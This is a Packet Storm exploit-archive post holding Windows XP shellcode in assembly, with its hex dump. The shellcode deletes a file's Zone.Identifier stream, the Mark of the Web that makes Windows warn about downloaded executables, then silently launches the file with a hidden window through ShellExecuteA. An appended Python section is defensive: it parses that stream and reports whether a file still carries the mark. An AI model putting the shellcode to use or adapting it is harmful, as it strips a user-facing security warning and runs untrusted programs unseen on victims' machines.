Zone.Identifier ADS Shellcode Bypass

Posted Dec 21, 2009
Authored by sinn3r

This shellcode attempts to delete the Zone.Identifier ADS and then runs the file using the ShellExecuteA function.

tags | shellcode
SHA-256 | 7c5c86d8a1260728dd1fb1099f979199962e2487372f6851fa49aa70d4606fca

; Author: sinn3r
; Tested on Windows XP SP3
; Description:
; This shellcode will attempt to delete the Zone.Identifier ADS (it's a
; trick Microsoft uses to warn you about an exe when you try to run it),
; and then run the file using the ShellExecuteA function.
; Make sure the exploited app has the following components loaded
; (should be pretty common):
; KERNEL32, msvcrt, SHELL32

[BITS 32]

global _start

_start:

push 0x00657865
push 0x2e747365
push 0x745c3a43
xor edi, edi
mov edi, esp ; edi = "C:\test.exe"

xor esi, esi
push 0x00004154
push 0x4144243a
push 0x72656966
push 0x69746e65
push 0x64492e65
push 0x6e6f5a3a
mov esi, esp ; esi = ":Zone.Identifier:$DATA"

push esi ; src
push edi ; dest
xor eax, eax
mov eax, 0x77C46040 ; msvcrt.strcat (Windows XP SP3)
call eax ; edi now = "C:\test.exe:Zone.Identifier:$DATA"

; strcat is cdecl, so both arguments are still on the stack: the dest
; pointer (edi) at [esp] doubles as DeleteFileA's single argument
xor eax, eax
mov eax, 0x7c831ec5 ; KERNEL32.DeleteFileA (Windows XP SP3)
call eax

xor edx, edx
mov word [edi + 11], dx ; null-terminate at offset 11, restoring "C:\test.exe"

push edx
push 0x6e65706f
mov edx, esp ; edx = "open"
xor eax, eax
push eax ; nShowCmd = 0 (SW_HIDE)
push eax ; DefDir = NULL
push eax ; Parameters = NULL
push edi ; Filename
push edx ; Operation = "open"
push eax ; hwnd = NULL
mov eax, 0x7ca41150 ; SHELL32.ShellExecuteA (Windows XP SP3)
call eax

; shellcode:
; sinn3r@backtrack:~$ nasm -f bin shellexecute.asm -o shellexecute | cat shellexecute |hexdump -C |grep -v 00000066
; 00000000 68 65 78 65 00 68 65 73 74 2e 68 43 3a 5c 74 31 |hexe.hest.hC:\t1|
; 00000010 ff 89 e7 31 f6 68 54 41 00 00 68 3a 24 44 41 68 |...1.hTA..h:$DAh|
; 00000020 66 69 65 72 68 65 6e 74 69 68 65 2e 49 64 68 3a |fierhentihe.Idh:|
; 00000030 5a 6f 6e 89 e6 56 57 31 c0 b8 40 60 c4 77 ff d0 |Zon..VW1..@`.w..|
; 00000040 31 c0 b8 c5 1e 83 7c ff d0 31 d2 66 89 57 0b 52 |1.....|..1.f.W.R|
; 00000050 68 6f 70 65 6e 89 e2 31 c0 50 50 50 57 52 50 b8 |hopen..1.PPPWRP.|
; 00000060 50 11 a4 7c ff d0 |P..|..|
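Added defender-side example (not part of sinn3r's shellcode or the original post): a Python parser for the contents of the Zone.Identifier stream that this shellcode deletes, plus a helper that reports whether a file still carries the mark. The sample stream text is constructed, and opening the stream through the file:Zone.Identifier path syntax assumes Python running on Windows/NTFS.

```python
import os
from typing import Optional

# URLZONE values that browsers write into the ZoneId= field of the stream
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

# Constructed sample of a Zone.Identifier stream as written for a download
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://example.test/\r\n"
                 "HostUrl=https://example.test/setup.exe\r\n")


def parse_zone_identifier(text: str) -> Optional[dict]:
    """Parse the INI-style stream content into {'zone_id', 'zone_name',
    'referrer_url', 'host_url'}; None if there is no usable ZoneId."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "zonetransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    try:
        zone_id = int(fields["zoneid"])
    except (KeyError, ValueError):
        return None
    return {"zone_id": zone_id,
            "zone_name": ZONE_NAMES.get(zone_id, f"Unknown zone {zone_id}"),
            "referrer_url": fields.get("referrerurl"),
            "host_url": fields.get("hosturl")}


def is_untrusted(motw: dict) -> bool:
    # Internet (3) and Restricted Sites (4) are the zones Windows warns about
    return motw["zone_id"] >= 3


def motw_status(path: str) -> str:
    """Report a file's MOTW state. Assumes Python on Windows, where
    'file:Zone.Identifier' opens the ADS; elsewhere the open fails and the
    file reports as 'missing', the state the shellcode above leaves behind."""
    if not os.path.isfile(path):
        return "no such file"
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            motw = parse_zone_identifier(fh.read())
    except OSError:
        return "missing"
    if motw is None:
        return "malformed"
    return motw["zone_name"] + (" (untrusted)" if is_untrusted(motw) else "")
```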

© 2022 Packet Storm. All rights reserved.